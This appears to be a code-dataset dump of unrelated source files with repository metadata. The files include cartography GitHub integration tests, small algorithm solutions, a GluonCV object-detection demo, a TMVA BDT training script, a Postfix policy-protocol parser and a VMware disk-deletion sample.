ax.legend()
fig.tight_layout()
# plt.show()
fig.savefig('recordings_all.png')
# Figure 2: peak-to-peak normalised traces for shape comparison (RN vs VC).
fig, ax = plt.subplots()
ax.plot(tarray, recs_norm, lw=3, label='RN model')
ax.plot(tarray, resum_norm, 'r', lw=3, label='Sum VC model')
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Extracellular recordings (mV)')
ax.set_title('Extracellular recordings (normalised)')
ax.legend()
fig.tight_layout()
# plt.show()
fig.savefig('recordings_all_compare_RN_VC.png')
| [
"tom.morse@yale.edu"
] | tom.morse@yale.edu |
467a8932a4284ef0c6c865d87ef12e88ea571f4a | 3e63608e1cad90bc845c4580723e57ae7ca3f61d | /tests/integration/cartography/intel/github/test_repos.py | e15966d14e0a223c390827fa7a4e0532c091831d | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | lyft/cartography | 06dcbf13907cbb9a31b75cd8b21f5721f7cc1b01 | 830b8944879a01f52b21ee12b6fddf245f9733cb | refs/heads/master | 2023-08-31T12:27:59.752452 | 2023-08-28T20:42:12 | 2023-08-28T20:42:12 | 172,811,550 | 2,778 | 334 | Apache-2.0 | 2023-09-13T04:59:46 | 2019-02-27T00:16:29 | Python | UTF-8 | Python | false | false | 8,701 | py | import cartography.intel.github
import tests.data.github.repos
TEST_UPDATE_TAG = 123456789
TEST_JOB_PARAMS = {'UPDATE_TAG': TEST_UPDATE_TAG}
TEST_GITHUB_URL = "https://fake.github.net/graphql/"
def _ensure_local_neo4j_has_test_data(neo4j_session):
    # Load the canned GET_REPOS fixture into the local Neo4j instance so the
    # relationship tests below have a fully populated graph to query.
    # NOTE(review): this helper calls repos.load(...) with TEST_JOB_PARAMS,
    # while the transform/load unit tests call load_github_repos(...) with
    # TEST_UPDATE_TAG -- confirm both entry points match the intel module API.
    repo_data = cartography.intel.github.repos.transform(tests.data.github.repos.GET_REPOS)
    cartography.intel.github.repos.load(
        neo4j_session,
        TEST_JOB_PARAMS,
        repo_data,
    )
def test_transform_and_load_repositories(neo4j_session):
    """GitHubRepository nodes from the GET_REPOS fixture land in Neo4j with their URL ids."""
    transformed = cartography.intel.github.repos.transform(tests.data.github.repos.GET_REPOS)
    cartography.intel.github.repos.load_github_repos(
        neo4j_session,
        TEST_UPDATE_TAG,
        transformed['repos'],
    )
    result = neo4j_session.run(
        "MATCH(repo:GitHubRepository) RETURN repo.id",
    )
    expected = {
        "https://github.com/example_org/sample_repo",
        "https://github.com/example_org/SampleRepo2",
        "https://github.com/lyft/cartography",
    }
    assert {record['repo.id'] for record in result} == expected
def test_transform_and_load_repository_owners(neo4j_session):
"""
Ensure we can transform and load GitHub repository owner nodes.
"""
repositories_res = tests.data.github.repos.GET_REPOS
repos_data = cartography.intel.github.repos.transform(repositories_res)
cartography.intel.github.repos.load_github_owners(
neo4j_session,
TEST_UPDATE_TAG,
repos_data['repo_owners'],
)
nodes = neo4j_session.run(
"MATCH(owner:GitHubOrganization) RETURN owner.id",
)
actual_nodes = {n['owner.id'] for n in nodes}
expected_nodes = {
'https://github.com/example_org',
}
assert actual_nodes == expected_nodes
def test_transform_and_load_repository_languages(neo4j_session):
"""
Ensure we can transform and load GitHub repository languages nodes.
"""
repositories_res = tests.data.github.repos.GET_REPOS
repos_data = cartography.intel.github.repos.transform(repositories_res)
cartography.intel.github.repos.load_github_languages(
neo4j_session,
TEST_UPDATE_TAG,
repos_data['repo_languages'],
)
nodes = neo4j_session.run(
"MATCH(pl:ProgrammingLanguage) RETURN pl.id",
)
actual_nodes = {n['pl.id'] for n in nodes}
expected_nodes = {
'Python', 'Makefile',
}
assert actual_nodes == expected_nodes
def test_repository_to_owners(neo4j_session):
"""
Ensure that repositories are connected to owners.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH(owner:GitHubOrganization)<-[:OWNER]-(repo:GitHubRepository{id:$RepositoryId})
RETURN owner.username, repo.id, repo.name
"""
expected_repository_id = 'https://github.com/example_org/SampleRepo2'
nodes = neo4j_session.run(
query,
RepositoryId=expected_repository_id,
)
actual_nodes = {
(
n['owner.username'],
n['repo.id'],
n['repo.name'],
) for n in nodes
}
expected_nodes = {
(
'example_org',
'https://github.com/example_org/SampleRepo2',
'SampleRepo2',
),
}
assert actual_nodes == expected_nodes
def test_repository_to_branches(neo4j_session):
"""
Ensure that repositories are connected to branches.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH(branch:GitHubBranch)<-[:BRANCH]-(repo:GitHubRepository{id:$RepositoryId})
RETURN branch.name, repo.id, repo.name
"""
expected_repository_id = 'https://github.com/example_org/sample_repo'
nodes = neo4j_session.run(
query,
RepositoryId=expected_repository_id,
)
actual_nodes = {
(
n['branch.name'],
n['repo.id'],
n['repo.name'],
) for n in nodes
}
expected_nodes = {
(
'master',
'https://github.com/example_org/sample_repo',
'sample_repo',
),
}
assert actual_nodes == expected_nodes
def test_repository_to_languages(neo4j_session):
"""
Ensure that repositories are connected to languages.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH(lang:ProgrammingLanguage)<-[:LANGUAGE]-(repo:GitHubRepository{id:$RepositoryId})
RETURN lang.name, repo.id, repo.name
"""
expected_repository_id = 'https://github.com/example_org/SampleRepo2'
nodes = neo4j_session.run(
query,
RepositoryId=expected_repository_id,
)
actual_nodes = {
(
n['lang.name'],
n['repo.id'],
n['repo.name'],
) for n in nodes
}
expected_nodes = {
(
'Python',
'https://github.com/example_org/SampleRepo2',
'SampleRepo2',
),
}
assert actual_nodes == expected_nodes
def test_repository_to_collaborators(neo4j_session):
    """The cartography repo has exactly 5 outside collaborators with write access."""
    _ensure_local_neo4j_has_test_data(neo4j_session)
    result = neo4j_session.run("""
    MATCH (repo:GitHubRepository{name:"cartography"})<-[:OUTSIDE_COLLAB_WRITE]-(user:GitHubUser)
    RETURN count(user.username) as collab_count
    """)
    assert {record['collab_count'] for record in result} == {5}
def test_pinned_python_library_to_repo(neo4j_session):
"""
Ensure that repositories are connected to pinned Python libraries stated as dependencies in requirements.txt.
Create the path (:RepoA)-[:REQUIRES{specifier:"0.1.0"}]->(:PythonLibrary{'Cartography'})<-[:REQUIRES]-(:RepoB),
and verify that exactly 1 repo is connected to the PythonLibrary with a specifier (RepoA).
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
# Note: don't query for relationship attributes in code that needs to be fast.
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{id:'cartography|0.1.0'})
WHERE lib.version = "0.1.0"
RETURN count(repo) as repo_count
"""
nodes = neo4j_session.run(query)
actual_nodes = {n['repo_count'] for n in nodes}
expected_nodes = {1}
assert actual_nodes == expected_nodes
def test_upinned_python_library_to_repo(neo4j_session):
"""
Ensure that repositories are connected to un-pinned Python libraries stated as dependencies in requirements.txt.
That is, create the path
(:RepoA)-[r:REQUIRES{specifier:"0.1.0"}]->(:PythonLibrary{'Cartography'})<-[:REQUIRES]-(:RepoB),
and verify that exactly 1 repo is connected to the PythonLibrary without using a pinned specifier (RepoB).
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
# Note: don't query for relationship attributes in code that needs to be fast.
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{id:'cartography'})
WHERE r.specifier is NULL
RETURN count(repo) as repo_count
"""
nodes = neo4j_session.run(query)
actual_nodes = {n['repo_count'] for n in nodes}
expected_nodes = {1}
assert actual_nodes == expected_nodes
def test_setup_cfg_library_to_repo(neo4j_session):
"""
Ensure that repositories are connected to Python libraries stated as dependencies in setup.cfg.
and verify that exactly 2 repos are connected to the PythonLibrary.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
# Note: don't query for relationship attributes in code that needs to be fast.
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{id:'neo4j'})
RETURN count(repo) as repo_count
"""
nodes = neo4j_session.run(query)
actual_nodes = {n['repo_count'] for n in nodes}
expected_nodes = {2}
assert actual_nodes == expected_nodes
def test_python_library_in_multiple_requirements_files(neo4j_session):
"""
Ensure that repositories are connected to Python libraries stated as dependencies in
both setup.cfg and requirements.txt. Ensures that if the dependency has different
specifiers in each file, a separate node is created for each.
"""
_ensure_local_neo4j_has_test_data(neo4j_session)
query = """
MATCH (repo:GitHubRepository)-[r:REQUIRES]->(lib:PythonLibrary{name:'okta'})
RETURN lib.id as lib_ids
"""
nodes = neo4j_session.run(query)
node_ids = {n['lib_ids'] for n in nodes}
assert len(node_ids) == 2
assert node_ids == {'okta', 'okta|0.9.0'}
| [
"noreply@github.com"
] | noreply@github.com |
90777540d8bdcd99e145848d0134ea810df99bc4 | 2ce3d3e4c8e1e92359d94e08c421e44b8ef60b3a | /speedlimit/main.py | 98d3ae78c8ddfe16772d9454c51c1f02aaee36ec | [] | no_license | nhl4000/kattis | 0a2417b178d4543807eedbcb75b15e91f92ab63b | 4366682d82834b0330b38c403f5d27361840dfa9 | refs/heads/master | 2020-06-25T06:56:55.208802 | 2019-07-28T18:14:06 | 2019-07-28T18:14:06 | 199,238,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py |
# Kattis "Speed Limit": each dataset lists (speed, elapsed-hours) checkpoints;
# total distance is the sum of speed * hours-since-previous-checkpoint.
# NOTE: raw_input is Python 2; use input() if porting to Python 3.
distances = []
while(True):
    distance = 0
    previous_t = 0
    # Number of checkpoint pairs in this dataset; -1 terminates the input.
    i = int(raw_input())
    if (i == -1):
        break
    for _ in range(i):
        [s, t] = list(map(int, raw_input().split()))
        # t is cumulative, so only the delta since the last checkpoint counts.
        distance += s * (t -previous_t)
        previous_t = t
    distances.append(str(distance)+" miles")
print("\n".join(distances))
"marc.lozier@ryerson.ca"
] | marc.lozier@ryerson.ca |
47f4bbebd0ad96c1d2466f55070f18551eea1fa2 | 394d06f0839808157165de790aaaec2ef6b017b5 | /object-detection/demo_faster_rcnn.py | 98491509205318eb9a08c0dfa827276f461a0715 | [] | no_license | LXL1314/learn-gluoncv | 9d937d749af18e0915f11489d702d8e4dbc02d4a | 7bf8f2c0e638aae7b278744363f41a5cff7de5cc | refs/heads/master | 2020-07-07T22:45:32.361276 | 2019-08-29T12:53:52 | 2019-08-29T12:53:52 | 203,496,740 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | from gluoncv import utils, data, model_zoo
from matplotlib import pyplot as plt
# Pre-trained Faster R-CNN (ResNet-50 v1b backbone) trained on Pascal VOC.
net = model_zoo.faster_rcnn_resnet50_v1b_voc(pretrained=True)
im_fname = utils.download('https://github.com/dmlc/web-data/blob/master/' +
                          'gluoncv/detection/biking.jpg?raw=true',
                          path='../img/biking.jpg')
# load_test returns the preprocessed tensor for the net and the resized image for plotting.
x, img = data.transforms.presets.rcnn.load_test(im_fname)
class_IDs, scores, bounding_boxes = net(x)
# Draw boxes with confidence >= 0.98 for the first (only) image in the batch.
axe = utils.viz.plot_bbox(img, bboxes=bounding_boxes[0], scores=scores[0], labels=class_IDs[0], thresh=0.98, class_names=net.classes)
plt.show()
| [
"2995545137@qq.com"
] | 2995545137@qq.com |
b9af3fae8856807e32bf2d31ce7e14ead62f9716 | 27010a7ad70bf69511858a91d42dc7a64e61b66d | /src/1763_longest_nice_substring.py | f1a96df1b1ba601c788359bfd79537a5f6d61f4a | [
"Apache-2.0"
] | permissive | hariharanragothaman/leetcode-solutions | fb7d967f2c6e3f4c936e3c7afe369415bc8d2dc6 | 44e759f80d3c9df382fdf8d694d6378881e3649d | refs/heads/master | 2023-09-03T20:31:59.200701 | 2021-10-18T00:50:56 | 2021-10-18T00:50:56 | 267,927,538 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,765 | py | """
A string s is nice if, for every letter of the alphabet that s contains, it appears both in uppercase and lowercase. For example, "abABB" is nice because 'A' and 'a' appear, and 'B' and 'b' appear. However, "abA" is not because 'b' appears, but 'B' does not.
Given a string s, return the longest substring of s that is nice. If there are multiple, return the substring of the earliest occurrence. If there are none, return an empty string.
Example 1:
Input: s = "YazaAay"
Output: "aAa"
Explanation: "aAa" is a nice string because 'A/a' is the only letter of the alphabet in s, and both 'A' and 'a' appear.
"aAa" is the longest nice substring.
Example 2:
Input: s = "Bb"
Output: "Bb"
Explanation: "Bb" is a nice string because both 'B' and 'b' appear. The whole string is a substring.
Example 3:
Input: s = "c"
Output: ""
Explanation: There are no nice substrings.
Example 4:
Input: s = "dDzeE"
Output: "dD"
Explanation: Both "dD" and "eE" are the longest nice substrings.
As there are multiple longest nice substrings, return "dD" since it occurs earlier.
Constraints:
1 <= s.length <= 100
s consists of uppercase and lowercase English letters.
"""
class Solution:
    def longestNiceSubstring(self, s: str) -> str:
        """Return the longest substring in which every letter appears in both cases.

        For each start index, grow the end index while incrementally
        maintaining the sets of lowercase/uppercase letters seen so far; the
        window is "nice" exactly when the two case-folded sets coincide.
        Strict `>` comparison keeps the earliest occurrence on length ties.
        O(n^2) overall, instead of rebuilding the case strings for every
        substring (O(n^3)) as before.
        """
        best = ""
        n = len(s)
        for start in range(n):
            lowers = set()
            uppers = set()  # stored case-folded for direct comparison
            for end in range(start, n):
                ch = s[end]
                if ch.islower():
                    lowers.add(ch)
                elif ch.isupper():
                    uppers.add(ch.lower())
                if lowers == uppers and end - start + 1 > len(best):
                    best = s[start:end + 1]
        return best
| [
"hariharanragothaman@gmail.com"
] | hariharanragothaman@gmail.com |
8a0ddb23a7769f47461a1435349c088c9d3eb109 | 7ac721ed23494b0916ddabba976211f9a54868d1 | /SexaQAnalysis/TMVA/Step1/old/BDT_2016.py | 3f9d75999f941188b02e60aa171a114d447d0292 | [] | no_license | jarnedc/SexaquarkStandalone | d0198e5ef2cad4a0ce91ef62a2225626a1f16729 | b59cd2ba9bcd01485864e310f9c22fc840b2dbc4 | refs/heads/master | 2020-07-06T09:46:14.087096 | 2019-12-13T10:23:35 | 2019-12-13T10:23:35 | 202,975,828 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,442 | py | import ROOT
from ROOT import *
# Select Theano as backend for Keras
from os import environ
version = "v_18_variables_AdaBoost_04092019_MCBkg_noInvMassCutInTreeProduction_NoInvMassCutInBDTScript"
# Open file
#SignFile = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Analyzed_Skimmed/CRAB_AnalyzerAllSkimmed_WithPU2016NeutrinoGun_tryToFix_8_10072019_v1/crab_AnalyzerAllStepsSkimmedSexaqWithPU2016NeutrinoGun_tryToFix_8_10072019_v1/190710_104816/FlatTree_WithPU2016NeutrinoGun_tryToFix_8_10072019_v1.root")
SignFile1 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaqWithPU2016NeutrinoGun_tryToFix_8_10072019_v1/FlatTree_Skimmed_trial10.root")
SignFile2 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaqWithPU2016NeutrinoGun_tryToFix_8_trial11_17072019_v1/crab_SkimmingSexaqWithPU2016NeutrinoGun_tryToFix_8_trial11_17072019_v1/190717_083219/FlatTree/FlatTree_Skimmed_trial11.root")
SignFile3 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaq_Skimming_trial13_25072019_v1/crab_SkimmingSexaq_trial13_25072019_v1/190725_051522/FlatTree_Skimmed_trial13.root")
SignFile4 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_Step1Sexaq_trial14/crab_Step1_Step2_Skimming_FlatTree_Sexaq_trial14_04082019_v1/190804_115510/FlatTree_Skimmed_trial14.root")
SignFile5 = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/crmc_Sexaq/Skimmed/CRAB_SimSexaq_trial16/crab_Step1_Step2_Skimming_FlatTree_trial16_26082019_v1/190826_190802/combined_FlatTree_Skimmed_trial16.root")
#BkgFile = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/data_Sexaq/trialR/SingleElectron/FlatTree_SingleElectron2016_Background.root")
#BkgFile = ROOT.TFile.Open("/pnfs/iihe/cms/store/user/jdeclerc/data_Sexaq/trialR/SingleMuon/FlatTree_SingleMuonRun2016H_Background.root")
#Try Bkg sample without applying the inv_mass > 0 cut in the filling of the tree:
BkgFile = ROOT.TFile.Open("/user/jdeclerc/CMSSW_8_0_30_bis/src/SexaQAnalysis/AnalyzerAllSteps/test/FlatTreeProducer/FlatTree_SingleMuonRun2016H_Background_NoMinMassCut.root")
#Try as Bkg some background extracted from MC:
#BkgFile = ROOT.TFile.Open("/user/jdeclerc/CMSSW_8_0_30_bis/src/SexaQAnalysis/AnalyzerAllSteps/test/FlatTreeProducer/test_trial11_S_candidates_inMC.root")
# Get signal and background trees from file
SignalTree1 = SignFile1.Get("FlatTreeProducer/FlatTree")
SignalTree2 = SignFile2.Get("FlatTreeProducer/FlatTree")
SignalTree3 = SignFile3.Get("FlatTreeProducer/FlatTree")
SignalTree4 = SignFile4.Get("FlatTreeProducer/FlatTree")
SignalTree5 = SignFile5.Get("FlatTreeProducer/FlatTree")
BkgTree = BkgFile.Get("FlatTreeProducer/FlatTree")
# Add variables to dataloader
dataloader = ROOT.TMVA.DataLoader('dataset_BDT_2016')
#dataloader.AddVariable("_S_error_lxy_interaction_vertex") #selected
dataloader.AddVariable("_Ks_vz_decay_vertex") #selected --> might still be interesting
dataloader.AddVariable("_S_lxy_interaction_vertex") #selected
dataloader.AddVariable("_S_daughters_deltaphi")
dataloader.AddVariable("_S_daughters_deltaeta") # selected
dataloader.AddVariable("_S_daughters_openingsangle")
dataloader.AddVariable("_S_daughters_DeltaR")
dataloader.AddVariable("_S_Ks_openingsangle")
dataloader.AddVariable("_S_Lambda_openingsangle")
dataloader.AddVariable("_S_eta")
dataloader.AddVariable("_Ks_eta") # selected
dataloader.AddVariable("_Lambda_eta")
dataloader.AddVariable("_S_dxy_over_lxy") #selected
dataloader.AddVariable("_Ks_dxy_over_lxy") #selected
dataloader.AddVariable("_Lambda_dxy_over_lxy") #selected
#don't use following dxy variables as dxy_over_lxy seems the one which is most discriminating
#dataloader.AddVariable("_S_dxy_dzPVmin")
#dataloader.AddVariable("_Ks_dxy_dzPVmin")
#dataloader.AddVariable("_Lambda_dxy_dzPVmin")
#dataloader.AddVariable("_S_dxy")
#dataloader.AddVariable("_Ks_dxy")
#dataloader.AddVariable("_Lambda_dxy")
dataloader.AddVariable("_S_dz_min")
dataloader.AddVariable("_Ks_dz_min") # selected
dataloader.AddVariable("_Lambda_dz_min") #selected
#dataloader.AddVariable("_S_pt")
dataloader.AddVariable("_Ks_pt")# --> might still be interesting
#dataloader.AddVariable("_Lambda_pt")
# Add trees to dataloader
dataloader.AddSignalTree(SignalTree1, 1)
dataloader.AddSignalTree(SignalTree2, 1)
dataloader.AddSignalTree(SignalTree3, 1)
dataloader.AddSignalTree(SignalTree4, 1)
dataloader.AddSignalTree(SignalTree5, 1)
dataloader.AddBackgroundTree(BkgTree, 1)
trainTestSplit = 0.8
MasterCut = ROOT.TCut("\
Alt$(_S_error_lxy_interaction_vertex,0) < 0.1 &&\
(Alt$(_S_lxy_interaction_vertex,0) > 1.9 && Alt$(_S_lxy_interaction_vertex,0) < 12) &&\
Alt$(_S_chi2_ndof,0) < 4. && \
(Alt$(_S_daughters_deltaphi,0) < -0.6 || Alt$(_S_daughters_deltaphi,0) > 0.6) && \
Alt$(_S_daughters_openingsangle,0) < 1.6 && \
(Alt$(_S_daughters_deltaeta,0) > -2 && Alt$(_S_daughters_deltaeta,0) < 2) && \
Alt$(_S_Ks_openingsangle,0) < 1.4 && \
Alt$(_S_Lambda_openingsangle,0) < 1 && Alt$(_S_daughters_DeltaR,0) < 3.5 && \
(Alt$(_S_dxy_over_lxy,0) > 0 && Alt$(_S_dxy_over_lxy,0) < 0.25) && \
(Alt$(_S_dz_min,0) > -5 && Alt$(_S_dz_min,0) < 5)"
)
#Alt$(_S_mass,0) > 0. && Alt$(_S_chi2_ndof,0) < 4. && \
#Alt$(_S_daughters_deltaeta,0) < 2.5 && Alt$(_S_daughters_deltaeta,0) > -2.5 && \
#MasterCut = ROOT.TCut("Alt$(_S_error_lxy_interaction_vertex,0) < 0.1 && Alt$(_S_lxy_interaction_vertex,0) > 1.9 && Alt$(_S_mass,0) > 0. && Alt$(_S_chi2_ndof,0) < 4." )
dataloader.PrepareTrainingAndTestTree(MasterCut,\
'TrainTestSplit_Signal={}:'.format(trainTestSplit)+\
'TrainTestSplit_Background={}:'.format(trainTestSplit)+'SplitMode=Random')
# Setup TMVA
ROOT.TMVA.Tools.Instance()
ROOT.TMVA.PyMethodBase.PyInitialize()
outputFile = ROOT.TFile.Open('BDTOutput_2016_'+version+'.root', 'RECREATE')
factory = ROOT.TMVA.Factory('TMVAClassification', outputFile,
'!V:!Silent:Color:Transformations=I;D;P;G,D:'+\
'AnalysisType=Classification')
# BDT method
factory.BookMethod(dataloader,'BDT', 'BDT',
'H:!V:VarTransform=None:'+\
'NTrees=400:BoostType=AdaBoost:SeparationType=GiniIndex:nCuts=20:PruneMethod=CostComplexity:PruneStrength=12:UseBaggedBoost=True')
factory.TrainAllMethods()
factory.TestAllMethods()
factory.EvaluateAllMethods()
canvas = factory.GetROCCurve(dataloader)
canvas.Draw()
canvas.SaveAs("BDT_2016_"+version+".root")
| [
"jarne.theo.de.clercq@cern.ch"
] | jarne.theo.de.clercq@cern.ch |
01e4a166b1a96c6ed40e515a79db2f4f05132979 | 83957f263305c8021add5f05327381263cc6fdad | /mongrey/server/protocols.py | 92242373a487ab32a09578418932680ea295c321 | [
"BSD-3-Clause"
] | permissive | srault95/mongrey | d011727bb003ec02dd9797876a2cc055554d0ed9 | 63a94efd33db04e4b361dd259bfda3e520c305c8 | refs/heads/master | 2020-05-15T19:50:40.992062 | 2018-03-11T09:11:46 | 2018-03-11T09:11:46 | 35,269,256 | 0 | 0 | null | 2018-03-11T09:11:47 | 2015-05-08T08:58:12 | CSS | UTF-8 | Python | false | false | 4,686 | py | # -*- coding: utf-8 -*-
import uuid
import logging
import re
from .. import constants
from ..exceptions import InvalidProtocolError
line_regex = re.compile(r'^\s*([^=\s]+)\s*=(.*)$')
logger = logging.getLogger(__name__)
def parse_protocol_line(request):
"""
example:
client_name=123, client_address=1.1.1.1, sender=sender@example.net, recipient=rcpt@example.org
"""
try:
fields = dict(constants.ALL_FIELDS).keys()
protocol = dict([a.strip(',').split('=') for a in request.split()])
for key in fields:
if not key in protocol:
protocol[key] = None
if not "instance" in protocol:
protocol["instance"] = str(uuid.uuid1())
for key in protocol.copy().keys():
if not key in constants.POSTFIX_PROTOCOL['valid_fields'] + ['country']:
protocol.pop(key)
return protocol
except Exception, err:
logger.error(str(err))
def parse_policy_protocol(fileobj, debug=False):
"""
@see: http://www.postfix.org/SMTPD_POLICY_README.html
"""
protocol = {}
while True:
line = fileobj.readline()
if line:
line = line.strip()
if debug:
logger.debug(line)
if not line:
break
else:
m = line_regex.match(line)
if not m:
break
key = m.group(1)
value = m.group(2)
if len(protocol) == 0:
'''First line'''
if key != 'request':
raise InvalidProtocolError("Invalid Protocol")
if not value or value != 'smtpd_access_policy':
raise InvalidProtocolError("Invalid Protocol")
elif key == 'request':
'''request=smtpd_access_policy already parsing'''
raise InvalidProtocolError("Invalid Protocol")
if key in protocol:
logger.warn("key is already in protocol : %s" % key)
else:
value = value.decode('utf-8', 'ignore')
value = value.encode('us-ascii', 'ignore')
protocol[key] = value.lower()
request = protocol.get('request', None)
if not request:
raise InvalidProtocolError("Invalid Protocol")
else:
if request != 'smtpd_access_policy':
raise InvalidProtocolError("Invalid Protocol")
return protocol
def verify_protocol(protocol):
if not 'protocol_state' in protocol:
raise InvalidProtocolError("protocol_state field not in protocol")
protocol_state = protocol.get('protocol_state')
if not protocol_state.lower() in constants.ACCEPT_PROTOCOL_STATES:
raise InvalidProtocolError("this protocol_state is not supported: %s" % protocol_state)
for key in protocol.keys():
if not key.lower() in constants.POSTFIX_PROTOCOL['valid_fields']:
raise InvalidProtocolError("invalid field in protocol: %s" % key)
def tcp_table_protocol(fileobj, debug=False):
"""
@see: http://www.postfix.org/tcp_table.5.html
"""
protocol = {}
while True:
line = fileobj.readline()
if line:
line = line.strip()
if debug:
logger.debug(line)
if not line:
break
else:
"""
get SPACE key NEWLINE
Look up data under the specified key.
REPLY:
500 SPACE text NEWLINE
400 SPACE text NEWLINE
200 SPACE text NEWLINE
"""
return line
return protocol
def tcp_table_test():
"""
postconf -e "smtpd_client_restrictions = check_client_access tcp:127.0.0.0:15005"
postconf -e "smtpd_sender_restrictions = check_sender_access tcp:127.0.0.0:15005"
postconf -e "smtpd_recipient_restrictions = check_recipient_access tcp:127.0.0.0:15005, reject"
"""
from gevent.server import StreamServer
def handle(sock, address):
fileobj = sock.makefile()
key_search = tcp_table_protocol(fileobj, debug=True)
print "key_search : ", key_search
fileobj.write("200 TEST\n")
fileobj.close()
#sock.close()
server = StreamServer(listener=('127.0.0.0', 15005), handle=handle)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if __name__ == "__main__":
tcp_table_test() | [
"stephane.rault@radicalspam.org"
] | stephane.rault@radicalspam.org |
e18acdf10dc10f22be785b412c98734ef4391a78 | d190750d6cb34e9d86ae96724cf4b56a2f57a74a | /tests/r/test_morley.py | 562dc425811ab5a69db86c60b1d186302756d5a8 | [
"Apache-2.0"
] | permissive | ROAD2018/observations | a119f61a48213d791de0620804adb8d21c2ad9fb | 2c8b1ac31025938cb17762e540f2f592e302d5de | refs/heads/master | 2021-09-24T04:28:02.725245 | 2018-09-16T23:06:30 | 2018-09-16T23:06:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.morley import morley
def test_morley():
"""Test module morley.py by downloading
morley.csv and testing shape of
extracted data has 100 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = morley(test_path)
try:
assert x_train.shape == (100, 3)
except:
shutil.rmtree(test_path)
raise()
| [
"dustinviettran@gmail.com"
] | dustinviettran@gmail.com |
f1f37abf4b41bc03ab51f54e73615b835dc0f583 | 2d03be96751d29bc8e2686ee3a8bed890261b0fa | /Drivers/Community/ri_vmware-orchestration-driver/pyvmomi-community-samples/samples/fcd_delete_vdisk.py | 2ad0d42805eb70ef5a2c3cb00f63346d6723d57a | [
"MIT",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Spirent/Velocity-assets | 2007e4b565a40a4e5265c5e558c1af8ef703000e | 1d4233279d6c7a6c1145859d2bd3bd05d282ed3c | refs/heads/master | 2023-08-08T03:25:09.401108 | 2022-11-22T18:15:32 | 2022-11-22T18:15:32 | 105,230,520 | 5 | 20 | MIT | 2023-07-21T19:24:55 | 2017-09-29T04:40:38 | Python | UTF-8 | Python | false | false | 3,231 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Written by Chris Arceneaux
# GitHub: https://github.com/carceneaux
# Email: carceneaux@thinksis.com
# Website: http://arsano.ninja
#
# Note: Example code For testing purposes only
#
# This code has been released under the terms of the Apache-2.0 license
# http://opensource.org/licenses/Apache-2.0
"""
Python program for deleting a first class disk (fcd)
"""
import atexit
from tools import cli, tasks, disk
from pyVim import connect
from pyVmomi import vmodl
from pyVmomi import vim
def get_args():
"""
Adds additional args for deleting a fcd
-d datastore
-v vdisk
-y yes
"""
parser = cli.build_arg_parser()
parser.add_argument('-d', '--datastore',
required=True,
action='store',
help='Datastore name where disk is located')
parser.add_argument('-v', '--vdisk',
required=True,
action='store',
help='First Class Disk name to be deleted')
parser.add_argument('-y', '--yes',
action='store_true',
help='Confirm disk deletion.')
my_args = parser.parse_args()
return cli.prompt_for_password(my_args)
def main():
"""
Simple command-line program for deleting a snapshot of a first class disk.
"""
args = get_args()
try:
if args.disable_ssl_verification:
service_instance = connect.SmartConnectNoSSL(host=args.host,
user=args.user,
pwd=args.password,
port=int(args.port))
else:
service_instance = connect.SmartConnect(host=args.host,
user=args.user,
pwd=args.password,
port=int(args.port))
atexit.register(connect.Disconnect, service_instance)
content = service_instance.RetrieveContent()
# Retrieve Datastore Object
datastore = disk.get_obj(content, [vim.Datastore], args.datastore)
# Retrieve FCD Object
vdisk = disk.retrieve_fcd(content, datastore, args.vdisk)
# Confirming FCD deletion
if not args.yes:
response = cli.prompt_y_n_question("Are you sure you want to "
"delete vdisk '" + args.vdisk +
"'?",
default='no')
if not response:
print("Exiting script. User chose not to delete HDD.")
exit()
# Delete FCD
storage = content.vStorageObjectManager
task = storage.DeleteVStorageObject_Task(vdisk.config.id, datastore)
tasks.wait_for_tasks(service_instance, [task])
except vmodl.MethodFault as error:
print("Caught vmodl fault : " + error.msg)
return -1
return 0
# Start program
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
528f021c8e11f7846ea895d9ab7c934efff890de | 3d6632b1721128bdcaefd54af4617e3edadd3ca6 | /RunDir/python/SUSYHIT_SinglePhotonGrid_makeconfigfile.py | 9b8cce5e6386360d900e053c5f65eca57da7150e | [] | no_license | mtripiana/SUSYGrid | d1b5a844e0c907eac332c57fea23b4ee3d684368 | 29215cbdffac989f841a9c09e42553b4fcaafe50 | refs/heads/master | 2021-01-10T19:48:07.309947 | 2014-11-28T00:55:14 | 2014-11-28T00:55:14 | 33,213,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,184 | py | #! /usr/bin/python
#
import os, sys, commands
